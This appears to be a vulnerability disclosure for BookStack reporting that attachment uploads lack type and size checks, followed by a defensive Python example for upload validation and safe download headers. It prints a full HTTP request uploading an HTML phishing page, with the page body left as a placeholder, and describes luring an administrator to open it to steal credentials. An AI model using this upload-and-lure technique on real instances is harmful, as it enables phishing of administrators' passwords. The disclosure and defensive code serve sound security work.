While reading the recent BookStack source code (commit 31665410) I discovered that there is no check on the type or size of uploaded files. An authenticated user with the attachment-create permission can upload a file of any type. One possibility is to upload a phishing page and obtain administrator credentials.
POST /attachments/upload?uploaded_to=1 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------300959455021219094302820715478
Content-Length: 8071
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/books/new-name-book/page/nowa-strona-asdf/edit
Cookie: XSRF-TOKEN=eyJpdiI6ImFZNjR1bmp5d1BTWkFNQU83WFZXelE9PSIsInZhbHVlIjoiTFZ1OTZENzE0amR1emVBdEU4aGt3aEpYbEtieENkUGhmdXBCVlA4b1pMZ3BCb2xZN2haYVQ5Wkw5ZSs2c2tKXC9CbWc5bWFUcFJ4MTBDMmJORzdJXC8zTFhSTEV2dWk5NHl3R1JVd1ZEQTNyN09UQzY0Um5uQUx2Umc3UFdvNnlTUCIsIm1hYyI6IjlmODI1ZTYwMDcxNzdlNWFmMzYyZmYyNTFiM2I2OWE4YTQ0YWRiZWRkM2FhNzlmNzM1MTA0MzJhYjJhYmIxZTMifQ%3D%3D; bookstack_session=eyJpdiI6ImgwWndXajlMWkxlMTNKTlpJa1wvcDl3PT0iLCJ2YWx1ZSI6Ik1EdGZwdzdKNWxvS0lGS2g1bWZCcXcxOWd5amRNVTR1MWsrNGJwR28waXVoV2tIZ2QxT2RFOG5JaHplQlwvRUI2aWQ2ZkdIMnBSK1ZcL1RXNHRsSkVwdGNkcDBiTkFjTUo1ejY1N2dUaTlQNmx4aDhWMkdQcFhvSGpiaUFZQWFMQUkiLCJtYWMiOiIxNzlkMzgzODJiMzVlZjc4MzU4YzZmMTlhYmFiZWQ4NjgxMDA1NTAwNGMzMDc0NGM2ZThiMzMxZmNkOTViMjNiIn0%3D

-----------------------------300959455021219094302820715478
Content-Disposition: form-data; name="_token"

VUGoBgaUdmFPvl3XRKJLUaLJc5ETKEkhGinTNE3t
-----------------------------300959455021219094302820715478
Content-Disposition: form-data; name="file"; filename="phish.html"
Content-Type: text/html

[PHISHING PAGE SOURCE CODE]
-----------------------------300959455021219094302820715478--
The next step is to lure a user with higher privileges, who is able to read the page with id 1, into opening http://172.17.0.1:8888/attachments/[ID RETURNED BY POST]?open=true
Impact: an attacker can host phishing pages on the instance and obtain the passwords of admin users.
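The two controls the report says are missing, shown as an added illustration (this is not BookStack's code; the extension allowlist, size limit and header policy are assumptions): an upload check that rejects oversized files, disallowed extensions and content that sniffs as HTML, and a header policy under which a stored attachment opened with `?open=true` is never rendered inline as active content.

```python
import mimetypes
import re
from typing import NamedTuple

# Policy assumptions for this example, not BookStack settings.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "zip"}
MAX_BYTES = 10 * 1024 * 1024
# Types a browser would execute or render as active content if served inline.
ACTIVE_CONTENT_EXTENSIONS = {"html", "htm", "xhtml", "svg", "xml", "js"}
HTML_MARKERS = re.compile(rb"<\s*(!doctype\s+html|html|script|iframe|svg)\b", re.IGNORECASE)

# Constructed sample uploads mirroring the report: a phishing page and a benign PDF.
SAMPLE_PHISH = ("phish.html", b"<html><body><form method='post'>login</form></body></html>")
SAMPLE_PDF = ("report.pdf", b"%PDF-1.4 constructed sample body")


class UploadCheck(NamedTuple):
    accepted: bool
    reason: str


def _extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def check_upload(filename: str, data: bytes, max_bytes: int = MAX_BYTES) -> UploadCheck:
    """Server-side validation of an attachment before it is stored."""
    if len(data) > max_bytes:
        return UploadCheck(False, "file too large")
    ext = _extension(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return UploadCheck(False, f"extension not allowed: {ext or '(none)'}")
    # The extension alone is not enough: a renamed HTML file still renders as HTML
    # if the server later trusts the client's Content-Type or lets the browser sniff.
    if HTML_MARKERS.search(data[:1024]):
        return UploadCheck(False, "content looks like HTML/script")
    return UploadCheck(True, "ok")


def download_headers(filename: str, open_inline: bool) -> dict:
    """Response headers for serving a stored attachment; '?open=true' maps to open_inline."""
    safe_name = re.sub(r"[^\w.\-]", "_", filename)  # keep CR/LF and quotes out of the header
    headers = {"X-Content-Type-Options": "nosniff"}  # browser must not second-guess the type
    if open_inline and _extension(filename) not in ACTIVE_CONTENT_EXTENSIONS:
        headers["Content-Disposition"] = "inline"
        headers["Content-Type"] = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    else:
        # Active content is only ever offered as a download, never rendered on this origin.
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
        headers["Content-Type"] = "application/octet-stream"
    return headers
```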